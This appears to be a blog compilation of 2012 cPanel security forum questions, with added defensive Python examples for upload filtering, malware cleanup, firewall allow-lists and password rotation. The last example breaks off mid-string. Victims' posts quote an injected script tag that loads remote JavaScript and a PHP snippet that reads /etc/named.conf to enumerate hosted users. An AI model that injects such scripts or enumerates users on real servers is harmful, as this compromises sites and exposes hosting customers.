Friday, 6 July 2012
[Cpanel Blog] symlinks to files not owned by the user July,2012
What do I need to enable in cPanel to prevent users from creating symlinks to files they don't own?
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Wednesday, 4 July 2012
[Cpanel Blog] How to set restriction on uploading file type or extensions? July,2012
Hi,
I want to limit only files with approved extensions such as ".gif", ".jpeg", ".doc", etc. are allowed to be uploaded to the web server. This is vitally important for my server's security, since the web server might attempt to execute or specially process files with extensions like ".php", ".cgi", etc.
Can anybody advise how and where I can configure a restriction on uploaded files according to the logic below:
# Deny All File extension
# Except : .gif , .jpg , .pdf , .png.
Any help is highly appreciated.
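Added example for the logic in the post above (my code, not the poster's and not a cPanel setting): a server-side check that implements "deny every extension except .gif, .jpg, .pdf, .png" and, going a step further than the post, also refuses double extensions and content that does not match the claimed type. The sample payloads are constructed.

```python
"""
Added example, not from the forum post or from cPanel: a server-side upload
check implementing the post's logic, "deny every extension except .gif, .jpg,
.pdf, .png". It goes beyond the bare extension test in two ways: names with
more than one extension (shell.php.gif) are refused, because Apache's AddHandler
looks at every extension in a name, not only the last one; and the file's
leading bytes must match the type the extension claims, so a PHP script renamed
to picture.gif is refused as well. Sample payloads are constructed.
"""
import os

ALLOWED = {".gif", ".jpg", ".jpeg", ".pdf", ".png"}

# Bytes each allowed type starts with. A PHP script starts with "<?php", not these.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".pdf": (b"%PDF-",),
}


def naive_check(filename):
    """What many upload scripts do: look only at the last extension."""
    return os.path.splitext(filename)[1].lower() in ALLOWED


def safe_check(filename, data):
    """Allowlist check. Returns (accepted, reason)."""
    if not filename or filename != os.path.basename(filename):
        return False, "path separator or empty name"
    parts = filename.lower().split(".")
    # "shell.php.gif", "shell.gif." and ".htaccess" all fail this test
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "exactly one extension required"
    ext = "." + parts[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(original, counter):
    """Never keep the client's name on disk: the extension comes from the
    validated original, the basename is ours."""
    ext = "." + original.lower().rsplit(".", 1)[1]
    return f"upload_{counter:08d}{ext}"
```

Why the two extra rules: Apache's AddHandler matches every extension in a filename, so shell.php.gif can still be handed to PHP, and an extension says nothing about what the bytes are. Where the upload code is not yours to change, the same idea belongs in the web server configuration for the upload directory (mod_security, or disabling script handlers there); this block shows only the check itself.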
Saturday, 30 June 2012
[Cpanel Blog] disable special php.ini features with suexec June,2012
Hi,
we are using suexec in order to provide each customer with their own php.ini; is there any way to prevent customers from setting safe_mode to off in their php.ini?
Kind regards,
Christian
[Cpanel Blog] php 5.2.17 security backports question June,2012
Hello,
I run the default Apache (2.2.22) and PHP installation (5.2.17), installed using EasyApache through cPanel/WHM.
Secunia dot com released several security vulnerability notifications today that affect php 5.3x and 5.4x (and presumably 5.2x as well but I could be wrong).
Some of these vulnerabilities were reported today and others about a month ago. Have they already been backported to php 5.2.17 by the cpanel team when installed using easyapache? If not, will they? Or is the only choice to upgrade to the latest version of php 5.3x or 5.4x to be protected against these latest vulnerabilities?
We run many websites and unfortunately trying to get the web developers to update their code to work with php 5.3x and newer is a PITA. I'd still like to run php 5.2x but not if it's going to lead to the server getting rooted through arbitrary code execution vulnerabilities in php 5.2x.
Any info or tips are greatly appreciated.
Thank you!
secunia dot com/advisories/49731/ (cve's listed here)
secunia dot com/advisories/49014/ (cves listed here)
[Cpanel Blog] Using PHP to add a custom security policy June,2012
Hi, I just read http://www.cpanel.net/secpolicy.pdf
I was wondering if it's possible to add a custom security policy using PHP?
The PDF seems to mention Perl only.
Thursday, 28 June 2012
[Cpanel Blog] security problem, php and html files vulnerability June,2012
For 2 days I have had a problem with some accounts on some of my VPSes with cPanel.
I must find and replace a specific string in all accounts; I find this in all PHP and HTML files in some FTP roots:
<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>
in the first line of every file, and I must run a combination of find and sed commands to remove it.
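Added example (mine, not the poster's find-and-sed one-liner): locate the tag quoted above in every .php/.html file under a document root and strip it, keeping copies of the originals outside the document root. The paths in the __main__ block are assumptions.

```python
"""
Added example, not the poster's find/sed command: locate the injected <script>
line quoted in the post in every .php/.html file under a document root and
strip it, keeping a copy of each touched file. The tag is matched as a fixed
byte string, not a regex, so the dots and slashes in the URL cannot over-match.
Backups go to a directory outside the document root (the path in __main__ is an
assumption): a wp-config.php.bak left next to the original can be downloaded as
plain text, credentials included. Removing the tag does not close whatever let
it in; the backups are there so the files can still be examined.
"""
import os
import shutil

# The tag the poster found on the first line of the infected files.
INJECTED = (b'<script type="text/javascript" '
            b'src="http://domainname.com/wp-content/uploads/process.js"></script>')
SUFFIXES = (".php", ".html", ".htm")


def strip_injected(data, tag=INJECTED):
    """Remove every occurrence of tag. A line that was nothing but the tag goes
    entirely; where the tag was glued in front of real content (the post's
    "first line" case) only the tag is cut. Returns (new_data, occurrences)."""
    if tag not in data:
        return data, 0
    out, count = [], 0
    for line in data.splitlines(keepends=True):
        if tag in line:
            count += line.count(tag)
            line = line.replace(tag, b"")
            if line.strip() == b"":
                continue
        out.append(line)
    return b"".join(out), count


def find_infected(root, tag=INJECTED):
    """Paths of .php/.html files under root that contain the tag."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            # A symlink planted by one account could point at another account's
            # file; as root we would then rewrite that file. Skip links outright.
            if os.path.islink(path):
                continue
            try:
                with open(path, "rb") as fh:
                    if tag in fh.read():
                        yield path
            except OSError:
                continue  # unreadable or vanished: report nothing, change nothing


def clean_tree(root, backup_dir, tag=INJECTED):
    """Clean every infected file; returns {path: occurrences removed}."""
    report = {}
    for path in list(find_infected(root, tag)):
        with open(path, "rb") as fh:
            data = fh.read()
        new_data, n = strip_injected(data, tag)
        backup = os.path.join(backup_dir, os.path.relpath(path, root))
        os.makedirs(os.path.dirname(backup), exist_ok=True)
        shutil.copy2(path, backup)           # original kept for forensics
        with open(path, "wb") as fh:
            fh.write(new_data)
        report[path] = n
    return report


if __name__ == "__main__":
    # Assumed paths: one account's document root and a root-only backup area.
    for p, n in clean_tree("/home/example/public_html",
                           "/root/injection-backups/example").items():
        print(f"{p}: removed {n}")
```

Run it once per account, as root, after checking the backup directory is not itself web-accessible; the report tells you which files were touched and how many copies of the tag each carried, which is useful when deciding whether the injection was a one-off or a running process that will put it back.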
[Cpanel Blog] How can I temporarily NULL ROUTE one of my own IPs? June,2012
I am getting hit by a DDOS SYN FLOOD attack on a couple of currently unused IPs that have been configured on my server.
I just want to remove these IPs temporarily, so that no response (e.g. from Apache) is sent out to the remotely connecting IP.
I know I can have my data center NULL ROUTE these IPs for me, but I would rather just do it myself via shell, or in WHM.
Can this be easily accomplished?
Yes, we have CSF and the SYNFLOOD protections switched on, but at this point I would rather just pull the IPs for a while.
By the way, they are hitting port 443 rather than port 80 for some reason.
Thanks for any ideas here!
Tuesday, 26 June 2012
[Cpanel Blog] URGENT: mod_security trivial bypass in versions < 2.6.6 (cpanel uses 2.6.3) June,2012
I've just learnt that there is an exploit in the wild which makes it trivially easy to bypass mod_security in any version prior to 2.6.6.
Easyapache is currently bundling 2.6.3 which is vulnerable.
Can 2.6.6 be included in EasyApache ASAP? And if it's going to take weeks to implement, is there any way we can manually update mod_security to 2.6.6 until EA has it?
Sunday, 24 June 2012
[Cpanel Blog] DNS redirection June,2012
Hello,
I have a question. I have a dedicated server with cPanel, and I want, for example, when someone changes the nameservers of a domain name to my nameservers ns1.myhost.com and ns2.myhost.com, for it to show a page, because now it doesn't show anything unless the domain is added as an account.
Thank you
Friday, 22 June 2012
[Cpanel Blog] WHM Attack June,2012
I recently got attacked on my VPS ( which is a hosted VPS with WHM / cPanel on it)
I have cPHulk active on it and it locks them out after 3 attempts, but somehow my root password got changed and a customer's site had nice "you've been hacked" messages on it.
What can I do to protect WHM / cPanel?
Help!
Wednesday, 20 June 2012
[Cpanel Blog] Pingdom inaccurate results needs whitelisting - firewall rule update error June,2012
Hi,
we use pingdom's free version to monitor whether our site is up/down.
It sometimes gives a series of 'server down' email alerts when the website can actually be reached quite normally.
It would be easy to write it off as a buggy service that gives wrong or inaccurate results, except for the fact that a lot of pingdom users seem to be very happy and sure that pingdom alerts are fairly accurate.
It seems that it is mostly a firewall issue - where if you have blocked an IP range due to some malicious activity from that region, and pingdom happens to have a server in that IP range, it reports a down alert as the ping is blocked.
These are the relevant links I found:
Simple tool to list Pingdom Probe IPs
Automatically update iptables rules for Pingdom monitors. | Personal blog of Chris Ergatides
Automatically update Pingdom firewall rules | MG IT Solutions
However when I tried out the last one - a script named update_pingdom_servers.sh, it gave a series of errors:
Quote:
iptables: Bad rule (does a matching rule exist in that chain?)
iptables: No chain/target/match by that name
We are using csf+lfd as well, and every blacklist entry in cphulkd is also entered into the csf+lfd blacklist manually.
The alternative, as far as I understand would be to manually whitelist the IPs from the pingdom IP feed here: https://my.pingdom.com/probes/feed
Any pointers on how to fix this?
Any help is greatly appreciated.
Thanks in advance,
Dave
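Added example, not the scripts linked in the post: a parser for the probe feed that writes the addresses into csf.allow, the file csf reads on reload. The feed layout it assumes (an RSS item whose description begins "IP: a.b.c.d;") and the sample feed are constructed; compare with the live feed before using it.

```python
"""
Added example, not the scripts linked in the post: read a Pingdom probe feed
and turn it into csf.allow entries. On a csf+lfd server the allow file, not raw
iptables, is where these addresses belong: csf flushes and rebuilds its iptables
rules when it restarts, and "iptables: Bad rule (does a matching rule exist in
that chain?)" is what iptables -D prints when told to delete a rule that is no
longer there, which is what happens to a script that manages raw rules beside
csf. The feed layout assumed here (RSS items whose description starts with
"IP: a.b.c.d;") and the sample feed are constructed for this example; compare
against the live feed before relying on the parser.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET

SAMPLE_FEED = b"""<?xml version="1.0"?>
<rss version="2.0"><channel>
<item><title>Stockholm, Sweden</title>
<description>IP: 192.0.2.10; Hostname: s1.example.net; Country: Sweden</description></item>
<item><title>Dallas, TX, USA</title>
<description>IP: 198.51.100.7; Hostname: s2.example.net; Country: United States</description></item>
<item><title>Broken entry</title>
<description>IP: not-an-address; Hostname: x</description></item>
</channel></rss>"""

IP_RE = re.compile(r"IP:\s*([^;\s]+)")


def probe_ips(feed_bytes):
    """Sorted list of the valid IPv4 probe addresses in the feed. Malformed
    entries are skipped rather than written into the firewall config."""
    ips = set()
    for item in ET.fromstring(feed_bytes).iter("item"):
        m = IP_RE.search(item.findtext("description") or "")
        if not m:
            continue
        try:
            ips.add(ipaddress.IPv4Address(m.group(1)))
        except ValueError:
            continue
    return sorted(ips)


def csf_allow_lines(ips, comment="pingdom probe"):
    """csf.allow takes one address per line; text after '#' is a comment."""
    return [f"{ip} # {comment}" for ip in ips]


def merge_allow(existing_text, new_lines):
    """Append only the addresses not already listed. Returns (text, added)."""
    have = {line.split("#", 1)[0].strip() for line in existing_text.splitlines()}
    added = [line for line in new_lines if line.split("#", 1)[0].strip() not in have]
    lines = existing_text.splitlines() + added
    return "\n".join(lines) + "\n", added


if __name__ == "__main__":
    # Assumed: the feed was fetched separately (for example with curl) into this file.
    with open("pingdom-probes.rss", "rb") as fh:
        feed = fh.read()
    with open("/etc/csf/csf.allow") as fh:
        current = fh.read()
    text, added = merge_allow(current, csf_allow_lines(probe_ips(feed)))
    with open("/etc/csf/csf.allow", "w") as fh:
        fh.write(text)
    print(f"added {len(added)} entries; run 'csf -r' to load them")
```

The merge keeps whatever is already in csf.allow and only appends new addresses, so it can run from cron without growing the file each time; a `csf -r` afterwards loads the change. An allowed probe is still a third party that can reach the server, so the comment field matters: it is what lets you remove the entries later when you stop using the service.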
Saturday, 16 June 2012
[Cpanel Blog] mod_security Ruleset comparisons June,2012
What are cPanel admins' opinions of the various rulesets available for mod_security, and how well do they work on cPanel hosting 11.32 and up?
Which rulesets offer better integration into cPanel?
Is it possible to automatically have the latest rulesets applied?
Are there any caveats for using particular rule sets?
Besides gotroot and the OWASP ModSecurity Core Rule Set, are there other rule sets users would recommend?
[Cpanel Blog] Prevent other apps from sending mail besides exim June,2012
We have exim running on a server and got a notice that a client is sending spam. Unfortunately the mail is not going through exim as far as I can tell and there's nothing in the logs about it as a result.
How can we prevent other scripts that are running perhaps (couldn't find it in the process list currently but maybe they were before) from using outbound port 25? I only want exim to be able to use it.
Friday, 15 June 2012
[Cpanel Blog] Best Anti Virus software for linux centos cPanel/WHM June,2012
Hello,
Can you guys let me know the best anti-virus software for Linux CentOS cPanel/WHM???
Please don't suggest ClamAV, it's really poor; recently our client's website got hacked by hackers, and I scanned that website to check how many pages were infected, but ClamAV says the website is OK.
[Cpanel Blog] Clients unsuspending suspended locked accounts. June,2012
I have users that are unsuspending accounts at will when I lock and suspend an account.
How do I fix this?
[Cpanel Blog] Notified of compromised account: Where to go from here June,2012
A WordPress site on one of my hosts running WHM 11.32.3 build 19 was listed as a phishing website. I've disabled the account, but I was hoping for advice on where to go from here to try and find as much detail as possible as to how the site was compromised, and how to improve my security to stop it happening in the future, as I have other WordPress sites.
The site admin of the compromised site can be considered AWOL.
Thursday, 14 June 2012
[Cpanel Blog] How to disallow normal user read named.conf file? June,2012
A hacker ran a PHP script on a user account and could list all the domains and users on the same server. I have no evidence showing they can get the passwords, but it's not good to reveal the user IDs.
The script is simple: it gets the domain names from the /etc/named.conf file, then gets the users from /etc/valiases/. I tested with a normal user, but it does not have permission to read the files under /etc/valiases/. How can this PHP script read it?
Thanks for any help.
Code:
ls -lah /etc/valiases/
/bin/ls: /etc/valiases/: Permission denied
Hack code snippet:
Code:
$d0mains = @file("/etc/named.conf");
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
[Cpanel Blog] MySQL vulnerability June,2012
Hello,
oss-sec: Security vulnerability in MySQL/MariaDB sql/password.c
Are the cPanel MySQL binaries vulnerable?
Thank you,
Nibin.
[Cpanel Blog] whm save password June,2012
For those of us who are the only user of our particular computer, having the "save password"
makes it difficult to periodically change the password for WHM, especially using the Google
Chrome browser. In WHM, there should be a check box to check to save the password
or leave unchecked to not save it; this should be an option in the settings config,
similar to "Allow autocomplete in login screens", perhaps the next line in the WHM settings.
If programmed properly, it SHOULD update the password that is saved upon login, rather than forcing
us to delete all cookies, cache, etc., whenever we would like to change the password, such as after a certain time period or whatever other criteria we use to change passwords.
Thank you for all the improvements over the years to cPanel & WHM.
[Cpanel Blog] Jailed SSH? June,2012
Hey guys! I'm currently trying out CPanel as I'm thinking about moving from Plesk.
In Plesk I have an option under the settings for an account that says "Chrooted" for SSH access. When choosing this mode the user is jailed to his home directory and can't browse anything below it. Also the commands are very restricted: it only allows about 100 of them.
In cPanel I've set the user account to "Jailed Shell" but I don't really see any difference. I have 1257 commands to use, and when logged in as root I have 1279 commands. Also I can browse below my home directory and even list /.
Isn't there any setting to jail the SSH user to a certain number of commands and, of course, their home directory?
I use Git to update all my clients on the server, so I need SSH access.
Sunday, 10 June 2012
[Cpanel Blog] Comparison of Firewalls June,2012
Hello staff,
In your opinion, what is the best firewall listed below? And Why?
Firewalls: CSF | APF/BFD | FireStarter | Shorewall
If you know any firewall better than the ones mentioned above, post the name for us. :)
[Cpanel Blog] Custom Security Policy June,2012
I need to create a custom security policy: http://www.cpanel.net/secpolicy.pdf
The idea is to block access to WHM only for the users in the wheel group, unless they are accessing from a determined IP range.
That way we could avoid potential hacks using the infamous "scripts2/doautofixer?autofix=safesshrestart". (That script nullifies any other security measure taken to avoid undesired connections via SSH.)
Any ideas where to start?
Any "Hello World" security policy?
Regards
--
En Ibague - Comunidad de Ibague - Inicio
[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012
I've just rebuilt my server after a disk failure and mostly things have gone smoothly.
When I installed the SSL cert for one of my domains, I used the same procedure as with every other SSL cert I've installed. The server auto-detected the key and the CA bundle just fine and in all browsers except firefox, the cert loads without error.
For this one site, Firefox reports an invalid certificate chain, and the SSL test at https://www.ssllabs.com/ssltest/index.html reports incomplete chain.
I've gone to comodo and downloaded their full CA bundle and installed it. I've checked the apache config files and it is serving the CA bundle I expect and I've checked and the CA bundle is identical to other domains on the server with certs from the same provider.
The only difference I can find is that Qualys SSL Labs reports the chain length for a site without this problem as 3 (3788 bytes) and for the site with this problem as 1 (1318 bytes).
What I can't figure out is - where/how is this chain length being specified?
Did I just get a bum cert that needs to be re-issued, or is there some other problem here?
Friday, 8 June 2012
[Cpanel Blog] Single SSL certificate, multiple services + Apache June,2012
Hi,
Done quite a few searches about this, but I do need confirmation from an expert (where art thou, Tristan?) about a few questions I have:
A) On the "Manage Service SSL Certificates" page: can I install a single purchased certificate, issued for my hostname (host.mydomain.com), on each and every service (Exim, Dovecot, etc.) AND as a shared SSL certificate (which covers SSL for Apache only, I gather)?
B) On the "Install a SSL Certificate and Setup the Domain" page: for the Apache shared SSL certificate, do I set the user to "nobody"?
C) Does the third textarea of the page listed in point B), with the "Paste the ca bundle here (optional)" caption, need to be filled with the intermediate CA certificate (I bought a PositiveSSL certificate from Comodo)?
D) Are there any other specific steps outside of these two pages that I should consider to accomplish my goal of eliminating all warnings for my system as a whole?
E) When the certificate renewal comes, what is the least painful way to accomplish it (link welcomed)?
I will consider any human answering these questions as a personal friend to the death or until my server crashes and burns, whichever comes first.
Thanks :-)
[Cpanel Blog] Is cPHulk working properly? June,2012
I'm not sure if cPHulk is working properly or not. Could someone please confirm this for me?
The Logwatch email shows the following attempted attacks. All the IPs have been blocked, but I'm not sure if it was before or after the numbers got so high. I also noticed that the usernames had up to 1323 login attempts but were blocked for two weeks for 30 attempts.
Logwatch email (I've stripped out the IPs)
Failed logins from:
IP1: 333 times
IP2: 1374 times
IP3: 210 times
IP4: 223 times
Illegal users from:
IP1: 3520 times
IP2: 2815 times
IP3: 427 times
IP4: 9948 times
My settings
IP Based Brute Force Protection Period in minutes: 15
Brute Force Protection Period in minutes: 5
Maximum Failures By Account: 15
Maximum Failures Per IP: 10
Maximum Failures Per IP before IP is blocked for two week period: 30
Send a notification upon successful root login when the IP is not whitelisted: off
Extend account lockout time upon additional authentication failures: on
Send notification when brute force user is detected: off
Wednesday, 6 June 2012
[Cpanel Blog] disable cphulk per-account blacklists June,2012
On every server I set up, it always ends within a few days with an indeterminable number of foreign servers having pounded enough on the server login to lock out the "root" login account (and several others), and they continue to do so such that the accounts stay locked indefinitely. Essentially this turns cphulkd into a DDoS assistance toolkit.
I don't mind the idea of blacklisting IP addresses -- there's nothing wrong there. But I need to be able to disable the per-account lockout functionality. I thought that setting "Maximum Failures By Account" to "0" would do this. But it apparently does not -- it instead locks out accounts after the first login failure.
Is there a way to disable the account lockout function? Or do we just have to throw away cphulk completely?
Also, for the love of all that's holy, don't suggest whitelists. It doesn't solve the problem, just pushes it around a little.
[Cpanel Blog] Do I need ipv6 enabled? June,2012
This may be a dumb question, but frankly I do not know the answer. I have always used CSF on my server and have disabled IPv6 as recommended by it.
Now, I am starting to wonder if this was the correct thing to do? Am I preventing others in the world from accessing the domains, email, etc hosted on my server by having ipv6 disabled? Basically I am just wondering if 'people' trying to view my websites, send email to me, etc are being denied access if that makes sense.
- All of 'my' ip's associated with the server are ipv4
- WHM 11.32.2 (build 28)
- CENTOS 5.8 x86_64 standard
Monday, 4 June 2012
[Cpanel Blog] cPanel Security Measures June,2012
Can anyone please guide what security steps are necessary while setting up a new cpanel server? I would like to keep it the most secure for my clients so that they are not affected by exploits in WordPress and other content management systems.
[Cpanel Blog] ...A new self-signed certificate was installed to replace it. June,2012
This morning (June 1) I began getting warning messages when trying to check email that our secure certificate was expired. Since everyone is connecting to SSL ports for email, everyone got the message when trying to do a send/receive and was prevented from doing so until I could reset the cert. This is the message I was sent from WHM:
"The SSL certificate for courier-imapd on server.domain.com expired. A new self-signed certificate was installed to replace it."
"The SSL certificate for courier-pop3d on server.domain.com expired. A new self-signed certificate was installed to replace it."
"If you purchased the expired certificate from a certificate authority, you should replace the self-signed certificate as soon as possible. You can do this using WHM's "Manage Service SSL Certificates" interface: https://server.domain.com:2087/scrip...ageservicecrts (Main >> Service Configuration >> Manage Service SSL Certificates)"
Why did this occur? We use a wildcard cert that doesn't expire until 2015 for all our services located in "Main >> Service Configuration >> Manage Service SSL Certificates" and only the mail related certs were reset by WHM, thankfully, but I would like to know if this can be prevented in the future.
Thanks,
Michael
Saturday, 2 June 2012
[Cpanel Blog] Root was logged into dovecot using following authentication service: system June,2012
Root was logged into dovecot using following authentication service: system
Reverse DNS: r54h244.dixie-net.com
Origin Country: United States (US)
Please use the following links to add to the black list:
Single Ip: https://server.name:2087/cgi/bl.cgi?ip=64.49.54.244
I have swapped the mail server selection back to Courier; not sure if they could have done more harm?
OK, false alarm it seems, but thousands of access attempts.
Not sure why my firewall didn't stop him in time.
[Cpanel Blog] WHM password only 8 chars long! June,2012
If you set the root whm password to e.g. 1234567890123, you can login even if you type only 12345678 !!!
It seems that characters after the 8th are ignored!
Wednesday, 30 May 2012
[Cpanel Blog] multiple servers sharing security information May,2012
Since I've got multiple cPanel servers, I'd like them to share information regarding various security aspects. Maybe someone has already done this, so I'd appreciate some help.
I would like my servers to "transfer" (via scp for example) various updates (via diff files maybe?) of things like these:
/etc/spammeripblocks
cphulkd blacklist
iptables bans
etc..
Something that works like the current DNS cluster would be best. Servers synchronizing various updates among them.
Is there a Linux utility that can help me? or should I just build my own set of shell tools for that based on things like scp and diff?
Any help would be appreciated.
[Cpanel Blog] Mod_Evasive May,2012
We installed mod_evasive on our testing server and followed the article
http://systembash.com/content/how-to...h-mod_evasive/
Can anyone tell us how we can test mod_evasive with the CSF firewall? When we try to refresh pages again and again, CSF does not seem to block the IP.
[Cpanel Blog] I need help -- server got hacked, php injection May,2012
Hello,
I have 290 hosted sites.
Through some vulnerability in Joomla (what I'd consider), some people managed to insert malicious files in the tmp folder of some domains, and executed them.
Several encrypted shell scripts (such as c99shell) were injected. Most of the processes on my server were being killed every minute.
I also found a script that lists the cPanel users of all domains on my server, and email-bomber scripts.
And what worries me most:
Joomla stores the information related to the database in a file called configuration.php.
90% of the sites that I host are made in Joomla.
I found a Perl script in some domains that scans for the files configuration.php, config.php and wp-config.php in all domains on my server, and saves a copy in a .txt file.
That makes it possible to have access to all databases on my server, everything, including WHMCS, WordPress, Magento and Drupal databases.
My question is:
I need to change the password for all databases, and also change them in the configuration.php files, but I do not know a way to do this automatically.
Is there a script that does this change both in the configuration.php file and in MySQL (the MySQL user password)?
I have no idea how to do this. I'm using "grep" to find the malicious files on the server, since I have to delete them before making any changes to MySQL.
Last question: was it a problem in Joomla (a very old 1.5 version) or was it because my /tmp folder was not on an isolated partition? (I use OpenVZ.)
I also have no rules in mod_security running, because they were causing problems on my WordPress sites.
Furthermore, grep is dramatically increasing the server load.
Any help will be highly appreciated.
Edit: I have all the IPs in the Apache logs; they are from Nigeria. But I'm sure these IPs will not help much.
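Added example for the script asked about above (mine, not a cPanel or Joomla tool): rotate the database password in a Joomla configuration.php or a WordPress wp-config.php and produce the matching MySQL statement. The config files are constructed samples, and the SET PASSWORD form is the MySQL 5.x syntax of the day.

```python
"""
Added example, not a cPanel script: rotate the database password stored in a
Joomla configuration.php or a WordPress wp-config.php. The current DB user and
password are read out of the file as text (it is never executed), a new random
password is generated, the file text is rewritten, and the MySQL statement that
sets the same password on the server is returned so both can be applied
together. The SET PASSWORD form is the MySQL 5.x syntax of the time; on a
cPanel server the password is better changed through cPanel's own database
interface so that cPanel's records of the user stay in sync. The sample config
files are constructed. Apply the SQL first and write the file only if it
succeeded, so a failure leaves the site on its old, still valid credentials.
"""
import re
import secrets
import string

# Joomla 1.5/2.5:  var $password = 'x';  or  public $password = 'x';
# WordPress:       define('DB_PASSWORD', 'x');
PATTERNS = {
    "joomla": {
        "user": re.compile(r"""((?:var|public)\s+\$user\s*=\s*)(['"])(.*?)\2(\s*;)"""),
        "password": re.compile(r"""((?:var|public)\s+\$password\s*=\s*)(['"])(.*?)\2(\s*;)"""),
    },
    "wordpress": {
        "user": re.compile(r"""(define\(\s*['"]DB_USER['"]\s*,\s*)(['"])(.*?)\2(\s*\))"""),
        "password": re.compile(r"""(define\(\s*['"]DB_PASSWORD['"]\s*,\s*)(['"])(.*?)\2(\s*\))"""),
    },
}

SAMPLE_JOOMLA = """<?php
class JConfig {
\tvar $user = 'site_joomla';
\tvar $password = 'oldpass';
\tvar $db = 'site_db';
}
"""

SAMPLE_WP = """<?php
define('DB_NAME', 'site_wp');
define('DB_USER', 'site_wpuser');
define('DB_PASSWORD', 'oldpass');
"""

ALPHABET = string.ascii_letters + string.digits


def new_password(length=24):
    """Letters and digits only: the value then needs no escaping in PHP or SQL."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def detect(text):
    if "DB_PASSWORD" in text:
        return "wordpress"
    if "$password" in text:
        return "joomla"
    raise ValueError("not a Joomla or WordPress config file")


def read_credentials(text):
    """(db_user, db_password) as currently written in the file."""
    kind = detect(text)
    user = PATTERNS[kind]["user"].search(text)
    password = PATTERNS[kind]["password"].search(text)
    if not user or not password:
        raise ValueError("could not find both the DB user and the DB password")
    return user.group(3), password.group(3)


def rotate(text, password=None, host="localhost"):
    """Return (new_file_text, sql_statement, new_password)."""
    kind = detect(text)
    user, _old = read_credentials(text)
    if password is None:
        password = new_password()
    new_text, n = PATTERNS[kind]["password"].subn(
        lambda m: m.group(1) + m.group(2) + password + m.group(2) + m.group(4),
        text, count=1)
    if n != 1:
        raise ValueError("password line was not rewritten")
    sql = f"SET PASSWORD FOR '{user}'@'{host}' = PASSWORD('{password}');"
    return new_text, sql, password
```

Loop it over every account's document root once the shells and the Perl harvester are gone; rotating first would only hand the attacker the new passwords through the same script. The returned SQL and the rewritten file belong to one site, so keep them together and treat a site where the SQL fails as not rotated.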
Monday, 28 May 2012
[Cpanel Blog] Reserving passive ftp port range? May,2012
To get my FTP server working completely I had to assign a port range for it to use for passive connections, but that port range is not reserved. I would rather not have open ports for people on my server to take advantage of, so is there a way to reserve the ports for pure-ftpd only?
[Cpanel Blog] Report of a cpanel CSRF 0 day on twitter May,2012
I found this in my twitter feed this morning:
[webapps / 0day] - Cpanel 11.X Multiple CSRF Vulnerability /http://t.co/My79Xgmg/
Haven't had a chance to try it yet.
[Cpanel Blog] Password Reset Feature May,2012
Hello,
I want to enable this password reset option because sometimes users forget their passwords and call me to reset them, but sometimes I can't get near a computer... So I just want to know: is it secure to enable it? And if it is secure, then why is the default setting off? If it is OK to enable and no hacking attempts can be made, can I enable it?
Thursday, 24 May 2012
[Cpanel Blog] Security bug in cPanel login May,2012
Hi,
Turns out this is probably the easiest way to report a problem...
You have (what I'd consider) a security bug in your cPanel login system. On a reseller account (for example), if a user has the same password as the administrator, then even if the user logs into their site with their username and their password (which happens to be the same as the admin's), they get logged in as the admin! = Not good!!
James
[Cpanel Blog] Share your Mod Security configuration May,2012
If you all would not mind sharing your custom mod_security configuration from WHM. I feel this would be helpful for those who want to piece together and write their own mod_security configuration file.
[Cpanel Blog] Ip in spamhaus CBL May,2012
Our IP address was listed in the Spamhaus CBL; is it really caused by a backdoor trojan? How can I find it and who uploaded the script?
Thanks to all of you guys.
Tuesday, 22 May 2012
[Cpanel Blog] More and more "closed by DROP in ACL" in exim logs. May,2012
I'm seeing more and more of these kinds of entries in the exim_mainlog file:
2012-05-20 03:36:37 SMTP connection from (hxsf8pgx3x2uk) [41.136.196.2]:34124 closed by DROP in ACL
2012-05-20 03:36:43 SMTP connection from (bxkqlnohhfh) [110.172.150.2]:42054 closed by DROP in ACL
2012-05-20 03:37:23 SMTP connection from (windows-xp) [218.48.74.98]:42242 closed by DROP in ACL
2012-05-20 03:37:27 SMTP connection from (dell-2e58bfb0ba) [182.182.60.148]:16332 closed by DROP in ACL
2012-05-20 03:37:39 SMTP connection from (bubu-b74b3fbaa7) [89.137.235.17]:25125 closed by DROP in ACL
2012-05-20 03:38:01 SMTP connection from (school-0a0b7ad4) [106.66.249.123]:3029 closed by DROP in ACL
All of the IPs in such entries seem to be from notoriously shady sources, e.g. Iran, Korea, Russian Federation, and so on. We are seeing anywhere from 2 to 20 per minute of these "closed by DROP in ACL" log entries.
I'm guessing that this is Exim protecting itself from likely spam probes or something to that effect. But I am wondering if these guys are taking up POP ports with these attacks? And do you suppose it would be worth writing a script to drop these IPs in the server firewall, at least for the ones that hit the server repeatedly, i.e. for the worst offenders?
Thanks much.
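Added example, not a cPanel tool and not the poster's log (the sample uses documentation-range addresses in the same format): a parser for these lines that counts drops per peer and emits temporary csf blocks for the repeat offenders; the threshold and block lifetime are assumptions.

```python
"""
Added example, not the poster's log or a cPanel tool: count the peers behind
"closed by DROP in ACL" lines in exim_mainlog and produce temporary csf blocks
for the ones that keep coming back. The lines are Exim reporting that one of
its SMTP ACLs executed a "drop" verb, so they concern the SMTP listeners only
and say nothing about POP. The sample log is constructed in the format the post
quotes, with documentation-range addresses; the threshold, the block lifetime
and the use of csf -td are assumptions.
"""
import re
from collections import Counter

# 2012-05-20 03:36:37 SMTP connection from (helo) [1.2.3.4]:34124 closed by DROP in ACL
DROP_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) SMTP connection from "
    r"(?:\(([^)]*)\) )?\[([0-9a-fA-F.:]+)\](?::\d+)? closed by DROP in ACL"
)

SAMPLE_LOG = """\
2012-05-20 03:36:37 SMTP connection from (hxsf8pgx3x2uk) [192.0.2.1]:34124 closed by DROP in ACL
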